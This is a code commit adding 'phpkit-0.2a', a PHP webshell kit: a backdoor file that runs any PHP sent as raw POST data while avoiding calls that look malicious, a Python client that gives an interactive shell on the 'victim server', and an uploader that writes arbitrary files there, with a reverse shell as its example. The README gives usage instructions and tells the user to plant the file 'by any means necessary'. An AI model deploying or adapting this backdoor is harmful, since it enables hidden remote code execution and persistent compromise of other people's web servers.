update

php shell and jsp shell

php/phpkit-0.2a/CHANGELOG

@@ -0,0 +1,10 @@
+Changelog of phpkit development
+--
+0.1a - 07/01 (Jan)/2013 - Initial Commit
+0.1b - 08/01 (Jan)/2013 - Major Upgrade. Now tests for system(), shell_exec() and passthru()
+                          Uses simple logic to choose the first one that works.
+                          Needs code cleanup soon, and implementation of exec() :)
+0.2a - 17/01 (Jan)/2013 - Realized I was still thinking it was January. Updated the client a bit.
+                          Preparing for the 0.2a release by finishing the upload client and writing
+                          documentation for it. Code is a lot cleaner now though. Still need to fix
+                          the bloody "test" function :/

php/phpkit-0.2a/README

@@ -0,0 +1,100 @@
+ /$$$$$$$  /$$   /$$ /$$$$$$$  /$$       /$$   /$$    
+| $$__  $$| $$  | $$| $$__  $$| $$      |__/  | $$    
+| $$  \ $$| $$  | $$| $$  \ $$| $$   /$$ /$$ /$$$$$$  
+| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$  /$$/| $$|_  $$_/  
+| $$____/ | $$__  $$| $$____/ | $$$$$$/ | $$  | $$    
+| $$      | $$  | $$| $$      | $$_  $$ | $$  | $$ /$$
+| $$      | $$  | $$| $$      | $$ \  $$| $$  |  $$$$/
+|__/      |__/  |__/|__/      |__/  \__/|__/   \____/
+
+phpkit-0.2a
+
+Stealth PHP Backdooring Utility - Insecurety Research 2013
+
+This is a simple kit to demonstrate a very effective way of
+backdooring a webserver running PHP.
+Essentially, it functions by parsing out any valid PHP code
+from raw HTTP POST data sent to it, and executing said PHP.
+
+No eval() or other suspect calls are in the serverside script,
+the code is executed by the include() function. The php://input
+data stream (which is basically "anything sent via raw POST) is
+used to "capture" the raw POST data, and when parsed by include()
+the code sent is executed.
+
+This allows for many things to be done, i.e. executing any PHP 
+code you happen to write. The example client, phpkit.py, simply
+gives a "shell prompt" (non interactive, each command is executed
+in a new "context") on the victim server. It is trivial to write
+pretty much anything.
+
+This release includes a massively overhauled backdoor client, it
+tests various execution functions against the victim host before
+using whatever one works first. It is massively ugly code, but
+I intend to clean it up soonish.
+
+This release also includes a basic file uploader :)
+
+USAGE (backdoor part):
+You upload "odd.php" to the target webserver by any means necessary.
+You then run ./phpkit.py <url to php file on server> and enjoy!
+
+Example Use:
+[infodox@sahara:~/phpkit]$ ./phpkit.py http://localhost/odd.php
+
+[+] URL in use: http://localhost/odd.php 
+
+[+] Testing system function
+[+] system() function works
+shell:~$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+shell:~$ uname -a
+Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
+
+USAGE (file uploader part):
+This assumes "odd.php" is loaded onto the victim webserver, obviously.
+You run ./upload.py <url to odd.php> <file to upload> <remote path>
+Only works if remote path is writeable. /tmp/ is always good :)
+
+Example Use:
+[infodox@sahara:~/phpkit]$ python upload.py http://localhost/odd.php /etc/passwd /tmp/pass
+[+] Uploading File
+[+] Upload should be complete
+
+So the file uploaded, now I compare MD5sums to check did it bloody well work!
+[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
+2568416e280af88f82e982efd46525a8  /etc/passwd
+[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
+2568416e280af88f82e982efd46525a8  /tmp/pass
+
+Seems legit bro ;)
+
+TODO:
+MySQL client. 
+
+
+Notes:
+In two use-cases this was shown to not function.
+Use Case A: Servers with the Suhosin PHP Hardening Patches.
+In this case, php://input and other URL inclusion vectors are rendered
+unuseable due to the protections the Suhosin patches offer. i.e. this 
+tool don't work against Suhosin patched boxes.
+
+Use Case B: Servers where php.ini is dictated by httpd.conf
+In several cases where the php.ini is specific to the HTTP daemon, 
+runtime ini directive modification is not permissable. I have 
+personally observed this behaviour on Apache thus far, however
+further testing/research is needed to find a workaround of some kind.
+
+Please report if you have any issues getting this to work. Please
+test it on a server with allow_url_include = On , then if it works,
+set allow_url_include = Off , restart httpd, and check does it work.
+If it does not work, please report using the issue tracker at
+http://code.google.com/p/insecurety-research providing details of HTTPD
+configuration so I can attempt to figure out new things :)
+
+Questions, comments, bug reports and abuse? infodox () insecurety.net
+
+Licence: The do whatever you want with it, just don't rip code without
+giving credit licence. 

php/phpkit-0.2a/odd.php

@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>

php/phpkit-0.2a/phpkit.py

@@ -0,0 +1,106 @@
+#!/usr/bin/python
+# Client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twatter: @info_dox
+# Insecurety Research - 2013
+# version: 0.2a
+
+import requests
+import sys
+
+if (len(sys.argv) != 2):
+    print "Usage: " + sys.argv[0] + " <url of backdoor>"
+    print "Example: " + sys.argv[0] + " http://localhost/odd.php"
+    sys.exit(0)
+    
+url = sys.argv[1]
+tester = """echo w00tw00tw00t"""
+testkey = """w00tw00tw00t"""
+print "\n[+] URL in use: %s \n" %(url)
+
+###                      ###
+# Whole Bunch of Functions #
+###                      ###
+def genphp(func, cmd):
+    if func == "system":
+        rawphp = """system('%s');""" %(cmd)
+    elif func == "shellexec":
+        rawphp = """echo shell_exec('%s');""" %(cmd)
+    elif func == "passthru":
+        rawphp = """passthru('%s');""" %(cmd)
+    elif func == "exec":
+        rawphp = """echo exec('%s');""" %(cmd)
+    encodedphp = rawphp.encode('base64')
+    payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
+    return payload
+
+def test(url, tester, testkey): # This whole function is ugly as sin
+    print "[+] Testing system()" # I need to make it tighter
+    payload = genphp('system', tester) # No, really. Look at the waste
+    r = requests.post(url, payload) # It could be TIIINY and fast!
+    if testkey in r.text:
+        print "[+] system() works, using system."
+        func = 'system'
+        return func
+    else:
+        print "[-] system() seems disabled :("
+        pass
+    print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
+    payload = genphp('shellexec', tester) # THIS COULD BE TINY
+    r = requests.post(url, payload)  # But. Coffee is lacking
+    if testkey in r.text:
+        print "[+] shell_exec() works, using shell_exec"
+        func = 'shellexec'
+        return func
+    else:
+        print "[-] shell_exec() seems disabled :("
+        pass
+    print "[+] Testing passthru()"
+    payload = genphp('passthru', tester)
+    r = requests.post(url, payload)
+    if testkey in r.text:
+        print "[+] passthru() works, using passthru"
+        func = 'passthru'
+        return func
+    else:
+        print "[-] passthru() seems disabled :("
+        pass
+    print "[+] Testing exec()"
+    payload = genphp('exec', tester)
+    r = requests.post(url, payload)
+    if testkey in r.text:
+        print "[+] exec() works, using exec"
+        func = 'exec'
+        return func
+    else:
+        print "[-] exec() seems disabled :("
+        pass
+
+###                                        ###
+# End of functions and object oriented stuff #
+###                                        ###
+
+# the main body
+func = test(url, tester, testkey)
+while True:
+    try:
+        cmd = raw_input("shell:~$ ")
+        if cmd == "quit":
+            print "\n[-] Quitting"
+            sys.exit(0)
+        elif cmd == "exit":
+            print "\n[-] Quitting"
+            sys.exit(0)
+        else:
+            try:
+                payload = genphp(func, cmd)
+                hax = requests.post(url, payload)
+                print hax.text
+            except Exception or KeyboardInterrupt:
+                print "[-] Exception Caught, I hope"
+                sys.exit(0)
+    except Exception or KeyboardInterrupt:
+        print "[-] Exception or CTRL+C Caught, I hope"
+        print "[-] Exiting (hopefully) cleanly..."
+        sys.exit(0)

php/phpkit-0.2a/upload.py

@@ -0,0 +1,34 @@
+#!/usr/bin/python
+# Upload.py
+# File Upload client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twatter: @info_dox
+# Insecurety Research - 2013
+# version: 0.2a
+import requests
+import sys
+
+if (len(sys.argv) != 4):
+    print "Usage: " + sys.argv[0] + " <url of backdoor> <localfile> <remotefile>"
+    print "Example: " + sys.argv[0] + " http://localhost/odd.php reverseshell.py /tmp/rsh.py"
+    sys.exit(0)
+
+url = sys.argv[1]         
+localfile = sys.argv[2]
+remotefile = sys.argv[3]
+
+f = open(localfile, "r")
+rawfiledata = f.read()
+encodedfiledata = rawfiledata.encode('base64')
+
+phppayload = """<?php
+$f = fopen("%s", "a");
+$x = base64_decode('%s');
+fwrite($f, "$x");
+fclose($f);
+?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
+
+print "[+] Uploading File"
+requests.post(url, phppayload) # this is why I love the python requests library
+print "[+] Upload should be complete"